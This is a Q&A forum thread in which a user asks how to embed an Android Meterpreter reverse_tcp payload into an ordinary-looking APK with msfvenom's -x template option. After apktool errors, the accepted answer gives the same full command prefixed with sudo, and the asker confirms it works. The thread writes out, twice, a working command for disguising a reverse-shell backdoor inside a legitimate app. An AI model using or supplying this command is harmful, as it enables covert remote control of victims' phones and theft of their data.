# Msfvenom -x flag does not work

Tags: linux, msfvenom

I want to embed a payload to an apk file. I tried to use the `msfvenom -x ScreenBrightness.apk -p android/meterpreter/reverse_tcp LHOST=<my_ip> LPORT=4444 R > output.apk`

And this was the output:

`Using APK template: ScreenBrightness.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.0-dirty
/usr/bin/apktool: line 27: mkdir: command not found
/usr/bin/apktool: line 28: ln: command not found`

Then I checked the directory and found that there was a file named output.apk

I tried to install the output.apk on my android it said `App not Installed`. I've tried multiple times but this was the result.

So, I tried to install the output.apk using adb by command `adb install output.apk`

And still this was the output:

`Failure [INSTALL_FAILED_INVALID_APK]`

I am using Linux: `Parrot GNU/Linux`
My android: Android 6.0.1 (Marshmello)

What should I do to properly embed a payload to an apk file?

Thanks in Advance.

Comment: where did you get ScreenBrightness.apk?

Comment: have you tried running msfvenom with more verbosity?

Comment: You have an error when you run a command. You need to troubleshoot the error. If you get this on **every** payload and APK template, then you have a broader question.

Comment: @schroeder Yes, I get this error with every single apk file.

Answer (score 0, accepted):

Try it with sudo like:

```
sudo msfvenom -x ScreenBrightness.apk -p android/meterpreter/reverse_tcp LHOST=<my_ip> LPORT=4444 R > output.apk
```

Comment: Can you expand on this answer? Why would sudo fix the problem?

Comment: @schroeder I tried the command suggested above and it worked!!! Sudo Really worked! Thank you.

Comment: @DVSDSV do you understand why sudo worked and what sudo does?

Comment: @schroeder I may not know the proper reason. But I think Metasploit uses Apktool to decompile and recompile the apk file and Apktool Requires root permission to do it successfully. This reason might not be correct, Since, It's my personal opinion. Please do correct me. Thank You.